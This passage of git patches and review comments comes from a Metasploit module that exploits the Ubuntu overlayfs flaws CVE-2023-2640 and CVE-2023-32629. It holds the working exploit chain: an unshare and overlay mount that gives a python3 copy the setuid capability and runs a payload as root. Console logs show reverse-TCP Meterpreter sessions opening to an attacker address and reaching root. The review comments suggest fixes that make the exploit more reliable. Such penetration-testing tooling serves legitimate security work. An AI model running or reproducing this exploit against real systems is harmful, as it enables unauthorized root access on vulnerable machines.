info -d command. + +msf6 exploit(linux/local/gameoverlay_privesc) > run + +[*] Started reverse TCP handler on 10.5.135.201:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Detected Ubuntu version: Jammy Jellyfish +[*] Detected kernel version: 5.19.0-41-generic +[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable +[*] Creating directory /tmp/UqNFkc/ +[*] Creating directory /tmp/UqNFkc/QKZiqWWsnSOz/ +[*] Creating directory /tmp/UqNFkc/WbrucZxIAlWZF/ +[*] Creating directory /tmp/UqNFkc/uKmqunqY/ +[*] Creating directory /tmp/UqNFkc/pwFUmC/ +[*] Writing payload: /tmp/UqNFkc/pVmtuGOGXdO +[*] Starting new namespace, and running exploit... 
+[+] Deleted /tmp/UqNFkc/ +[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:49168) at 2024-10-02 16:28:43 -0500 +[*] + +meterpreter > sysinfo +Computer : 10.5.132.149 +OS : Ubuntu 22.04 (Linux 5.19.0-41-generic) +Architecture : aarch64 +BuildTuple : aarch64-linux-musl +Meterpreter : aarch64/linux +meterpreter > getuid +Server username: root +meterpreter > +``` diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index a5f219453485..4cf02a618ada 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -5,6 +5,7 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::FileDropper + include Msf::Exploit::EXE def initialize(info = {}) super( @@ -25,6 +26,7 @@ def initialize(info = {}) 'Author' => [ 'g1vi', # PoC 'h00die', # Module Suggestion + 'bwatters-r7', # MsF Module 'gardnerapp', # MsF Module ], 'Platform' => ['linux'], @@ -43,7 +45,7 @@ def initialize(info = {}) [ 'Linux_Binary', { - 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Arch' => [ ARCH_AARCH64, ARCH_X64 ], 'PrependSetuid' => true } ], 
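Review bot: Changing the Linux_Binary target's `'Arch'` from `[ ARCH_X86, ARCH_X64 ]` to `[ ARCH_AARCH64, ARCH_X64 ]` silently drops 32-bit x86 support, which the commit message does not mention; nothing in the overlayfs technique is architecture specific, so unless x86 was found not to work, list all three: `'Arch' => [ ARCH_X86, ARCH_X64, ARCH_AARCH64 ],`. If x86 was dropped deliberately, a short comment on that line saying why would save the next reader the question.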
@@ -116,28 +118,31 @@ def check end def exploit - datastore['PayloadFilename'] pay_dir = datastore['WritableDir'] pay_dir += '/' unless pay_dir.ends_with? '/' - pay_dir += Rex::Text.rand_text_alpha 10 - pay_dir += '/' unless pay_dir.ends_with? '/' + + pay_dir += Rex::Text.rand_text_alpha(rand(6..13)) + '/' + print_status "Creating directory to store payload: #{pay_dir}" mkdir pay_dir - pay_dir = datastore['WritableDir'] - pay_dir << '/' unless pay_dir.ends_with? '/' - pay_dir += Rex::Text.rand_text_alpha(rand(6..13)) - pay_dir << '/' + directories = [] directories << pay_dir + lower_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' directories << lower_dir + upper_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' directories << upper_dir + work_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' directories << work_dir + merge_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/' directories << merge_dir - bash_copy = '/var/tmp/bash' + + bash_copy = '/var/tmp/' + Rex::Text.rand_text_alpha(rand(6..13)) + # bash_copy = '/var/tmp/bash' directories.each do |dir| print_status "Creating directory #{dir}" From 441a3215b233b329b46869d22f4627b04cca134c Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 19 Nov 2024 08:59:22 -0600 Subject: [PATCH 09/11] Catch up to head on other branch --- modules/exploits/linux/local/gameoverlay_privesc.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 4cf02a618ada..63517e18f144 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -178,8 +178,6 @@ def exploit exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'" - vprint_status(exploit_cmd.to_s) - output = cmd_exec(exploit_cmd) print_status(output) end 
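Review bot: `bash_copy = '/var/tmp/' + Rex::Text.rand_text_alpha(rand(6..13))` hard-codes `/var/tmp` while every other path honours `WritableDir`, and the copy is only removed by the `rm -rf` at the tail of the exploit command, so any failure before that step leaves a stray copy of bash behind; build it under `pay_dir` and call `register_file_for_cleanup(bash_copy)` so FileDropper removes it regardless. The commented-out `# bash_copy = '/var/tmp/bash'` line should go. The `exploit` method continues outside the hunk.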
From 59229ee61244145d6747dab9f1369134c6f869cb Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 17 Dec 2024 16:52:24 -0600 Subject: [PATCH 10/11] Update payload name, fix payload escapes & quotation, add unix cmd support --- .../linux/local/gameoverlay_privesc.rb | 28 ++++++++++--------- 1 file changed, 15 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 63517e18f144..4172164bff0e 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -29,7 +29,7 @@ def initialize(info = {}) 'bwatters-r7', # MsF Module 'gardnerapp', # MsF Module ], - 'Platform' => ['linux'], + 'Platform' => ['linux', 'unix'], 'SessionTypes' => ['shell', 'meterpreter'], 'DisclosureDate' => '2023-07-26', 'References' => [ @@ -55,7 +55,7 @@ def initialize(info = {}) 'Arch' => ARCH_CMD, 'Payload' => { - 'BadChars' => "\x93\x94" + 'BadChars' => "\x22\x27" } } ] @@ -69,7 +69,7 @@ def initialize(info = {}) ) register_options [ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']), - OptString.new('PayloadFileName', [true, 'Name of payload', 'marv']), + OptString.new('PayloadFileName', [true, 'Name of payload', Rex::Text.rand_text_alpha(rand(8..12))]) ] end @@ -150,7 +150,7 @@ def exploit end if target.arch.first == ARCH_CMD - payload_cmd = "\\\"#{payload.encoded}\\\"" + payload_cmd = payload.encoded else pay_file = datastore['PayloadFilename'] payload_path = "#{pay_dir}#{pay_file}" 
@@ -164,22 +164,24 @@ def exploit # Exploit overlayfs vuln # Build the command + rmrf_cmd = " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}" exploit_cmd = 'unshare -rm sh -c "' exploit_cmd << "cp #{cmd_exec('which python3')} #{lower_dir}; " exploit_cmd << "setcap cap_setuid+eip #{lower_dir}python3; " exploit_cmd << "mount -t overlay overlay -o rw,lowerdir=#{lower_dir},upperdir=#{upper_dir},workdir=#{work_dir} #{merge_dir} && " - exploit_cmd << "touch #{merge_dir}*; \" && " + exploit_cmd << "touch #{merge_dir}*; " exploit_cmd << "#{upper_dir}python3 -c 'import os;os.setuid(0);os.system(" - exploit_cmd << "\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && " - exploit_cmd << "chmod +x #{payload_cmd} && " unless target.arch.first == ARCH_CMD - exploit_cmd << "#{bash_copy} -p -c " - exploit_cmd << payload_cmd - exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD - exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'" - + exploit_cmd << "\\\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && " + if target.arch.first == ARCH_CMD + payload_cmd.gsub!('\\\\\\', '\\\\\\\\') + exploit_cmd << "#{bash_copy} -p -c \\\\\\\"(#{payload_cmd}); #{rmrf_cmd}\\\\\\\"" + else + exploit_cmd << "chmod +x #{payload_cmd} && #{payload_cmd} & #{rmrf_cmd}" + end + exploit_cmd << "\\\")'\"" output = cmd_exec(exploit_cmd) - print_status(output) + vprint_status(output) end end From b7f477172f23372e9288a531111127750edcd97a Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 18 Dec 2024 14:08:10 -0600 Subject: [PATCH 11/11] Update docs to reflect recent changes --- .../linux/local/gameoverlay_privesc.md | 103 ++++++++++-------- 1 file changed, 56 insertions(+), 47 deletions(-) diff --git a/documentation/modules/exploit/linux/local/gameoverlay_privesc.md b/documentation/modules/exploit/linux/local/gameoverlay_privesc.md index 38f00adb4a51..0630406fe0ca 100644 
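Review bot: `cmd_exec('which python3')` is interpolated straight into the `cp` on the second line of the command with no check, so on a target without python3 the chain degrades to `cp  <lower_dir>;` and fails with no actionable error; resolve it first and bail, e.g. `python_path = cmd_exec('which python3').strip` followed by `fail_with(Failure::NotFound, 'python3 not found on target') if python_path.empty?`, and give `setcap` the same treatment since the module depends on it just as hard. `rmrf_cmd` runs while the overlay is still mounted inside the unshare'd namespace, which is the `rm: cannot remove '…': Device or resource busy` visible in the updated documentation; prefixing it with `umount #{merge_dir};` (or running the cleanup after `unshare` returns) lets `merge_dir` actually be removed instead of leaving a directory behind. The backslash handling `payload_cmd.gsub!('\\\\\\', '\\\\\\\\')` also looks off: the pattern is three literal backslashes and, after gsub's own `\\` processing of the replacement string, the substitution yields two, so a single backslash in the payload is left untouched; if the intent is to double every backslash for the `sh -c "…"` layer, the block form `payload_cmd.gsub!('\\') { '\\\\' }` does that without the replacement-escape ambiguity.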
--- a/documentation/modules/exploit/linux/local/gameoverlay_privesc.md +++ b/documentation/modules/exploit/linux/local/gameoverlay_privesc.md @@ -1,20 +1,20 @@ ## Description -CVE-2023-2640 and CVE-2023-32629 are vunerabilites that allow for the arbitrary setting of +CVE-2023-2640 and CVE-2023-32629 are vulnerabilities that allow for the arbitrary setting of capabilities while overlaying filesystems. On most Linux Kernels during the execution of `ovl_do_setxattr` an intermediate function `vfs_setxatrr` converts file capabilities in a -way that limits them to the current namesapce. However, on some versions of the Ubuntu kernel +way that limits them to the current namespace. However, on some versions of the Ubuntu kernel `_vfs_setxattr_noperm` is called directly without calling `vfs_setxattr`. When a new namespace is created the user will technically be "root" within that given -namespace. This module will take advantage of this by setting the `CAP_SETUID` capability +namespace. This module will take advantage of this by setting the `CAP_SETUID` capability on a system binary. It will then perform filesystem overlay, copying the binary into the lower -directory. Because of the flaws described above when the binary is transfered into the upper -directory it's capabilities will not be sanitized and persist in the "normal" namespace. +directory. Because of the flaws described above when the binary is transferred into the upper +directory its capabilities will not be sanitized and persist in the "normal" namespace. ## Vunerable Application -These vunerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases +These vulnerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases and kernel versions, as described in the list below. Ubuntu 23.04 (Lunar Lobster)m kernel 6.2.0, (CVE-2023-2640 & CVE-2023-32629) 
@@ -29,17 +29,17 @@ Ubuntu 20.04 LTS (Focal Fossa), kernel -> 5.4.0, (CVE-2023-32629) Ubuntu 18.04 LTS (Bionic Beaver), kernel -> 5.4.0, (CVE-2023-32629) -The user can download a vunerable version, for example: +The user can download a vulnerable version, for example: ``` sudo apt update sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic reboot ``` -While testing @bwatters7 mentioned taking the system Be sure to take the system offline to -prevent the vunerabilities from silently being patched. +While testing, @bwatters7 mentioned taking the system offline as this appears to be patched automatically. +Be sure to take the system offline to prevent the vulnerabilities from silently being patched. -This module has succesfully been tested on the following: +This module has successfully been tested on the following: Ubuntu 22.04 LTS (Jammy Jellyfish) 5.19.0-41-generic @@ -49,11 +49,11 @@ Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws 1). Start `msfconsole` -2). Get a session on a vunerable system +2). Get a session on a vulnerable system 3). Use `exploit/linux/local/gameoverlay_privesc` -4). Optional: choose target for payload, either system command (1) or payload (2) +4). Optional: choose target for payload, either linux binary (0) or [li|u]nix command (1) `set target 1` 5). Set session `set session [SESSION]` 
@@ -65,42 +65,38 @@ Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws ## Options ### Payload File Name -Name of the file storing the payload, default is `marv`. +Name of the file storing the payload, default is random. ### Writable Dir -The name of a directory with write permissions, defualt is `/tmp`. This will be where the -payload file will be created. Additionally during the exploit a series of directories will be +The name of a directory with write permissions, default is `/tmp`. This will be where the +payload file will be created if necessary. Additionally during the exploit a series of directories will be created here to perform the filesystem overlaying. ## Scenarios You have a non-root session on one of the systems described above. Please note that this -module will automatically run checks to determine if the system is vunerable, you can disable +module will automatically run checks to determine if the system is vulnerable, you can disable this with `set AutoCheck False`. ``` - > use exploit/linux/local/gameoverlay_privesc -[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp -msf6 exploit(linux/local/gameoverlay_privesc) > set session 1 -session => 1 -msf6 exploit(linux/local/gameoverlay_privesc) > set target 0 -target => 0 -msf6 exploit(linux/local/gameoverlay_privesc) > set payload linux/aarch64/meterpreter_reverse_tcp -payload => linux/aarch64/meterpreter_reverse_tcp -msf6 exploit(linux/local/gameoverlay_privesc) > set lhost 10.5.135.201 -lhost => 10.5.135.201 +msf6 exploit(linux/local/gameoverlay_privesc) > +[*] Sending stage (3045380 bytes) to 10.5.132.129 +[*] Meterpreter session 3 opened (10.5.135.201:4585 -> 10.5.132.129:33504) at 2024-12-18 14:02:15 -0600 + +msf6 exploit(linux/local/gameoverlay_privesc) > set session 3 +session => 3 msf6 exploit(linux/local/gameoverlay_privesc) > show options Module options (exploit/linux/local/gameoverlay_privesc): Name Current Setting Required Description ---- --------------- -------- 
----------- - PayloadFileName pVmtuGOGXdO yes Name of payload - SESSION 1 yes The session to run this module on + PayloadFileName pSueaCXrnzH yes Name of payload + SESSION 3 yes The session to run this module on WritableDir /tmp yes A directory where we can write files -Payload options (linux/aarch64/meterpreter_reverse_tcp): +Payload options (linux/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- 
@@ -120,29 +116,42 @@ View the full module info with the info, or info -d command. msf6 exploit(linux/local/gameoverlay_privesc) > run -[*] Started reverse TCP handler on 10.5.135.201:4444 +[*] Started reverse TCP handler on 10.5.135.201:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Detected Ubuntu version: Jammy Jellyfish [*] Detected kernel version: 5.19.0-41-generic [+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable -[*] Creating directory /tmp/UqNFkc/ -[*] Creating directory /tmp/UqNFkc/QKZiqWWsnSOz/ -[*] Creating directory /tmp/UqNFkc/WbrucZxIAlWZF/ -[*] Creating directory /tmp/UqNFkc/uKmqunqY/ -[*] Creating directory /tmp/UqNFkc/pwFUmC/ -[*] Writing payload: /tmp/UqNFkc/pVmtuGOGXdO -[*] Starting new namespace, and running exploit... -[+] Deleted /tmp/UqNFkc/ -[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:49168) at 2024-10-02 16:28:43 -0500 -[*] +[*] Creating directory to store payload: /tmp/ODBpneOXk/ +[*] Creating directory /tmp/ODBpneOXk/ +[*] /tmp/ODBpneOXk/ created +[*] Creating directory /tmp/ODBpneOXk/ +[*] Creating directory /tmp/ODBpneOXk/ +[*] /tmp/ODBpneOXk/ created +[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/ +[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/ +[*] /tmp/ODBpneOXk/bmbtPAX/ created +[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/ +[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/ +[*] /tmp/ODBpneOXk/JtNbwLXJKw/ created +[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/ +[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/ +[*] /tmp/ODBpneOXk/hEhbByWL/ created +[*] Creating directory /tmp/ODBpneOXk/yvvSFre/ +[*] Creating directory /tmp/ODBpneOXk/yvvSFre/ +[*] /tmp/ODBpneOXk/yvvSFre/ created +[*] Writing payload: /tmp/ODBpneOXk/pSueaCXrnzH +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3045380 bytes) to 10.5.132.129 +[*] rm: cannot remove '/tmp/ODBpneOXk/yvvSFre/': Device or resource busy +[*] Meterpreter session 4 opened 
(10.5.135.201:4444 -> 10.5.132.129:44400) at 2024-12-18 14:02:42 -0600 -meterpreter > sysinfo -Computer : 10.5.132.149 -OS : Ubuntu 22.04 (Linux 5.19.0-41-generic) -Architecture : aarch64 -BuildTuple : aarch64-linux-musl -Meterpreter : aarch64/linux meterpreter > getuid Server username: root -meterpreter > +meterpreter > sysinfo +Computer : 10.5.132.129 +OS : Ubuntu 22.04 (Linux 5.19.0-41-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux + ```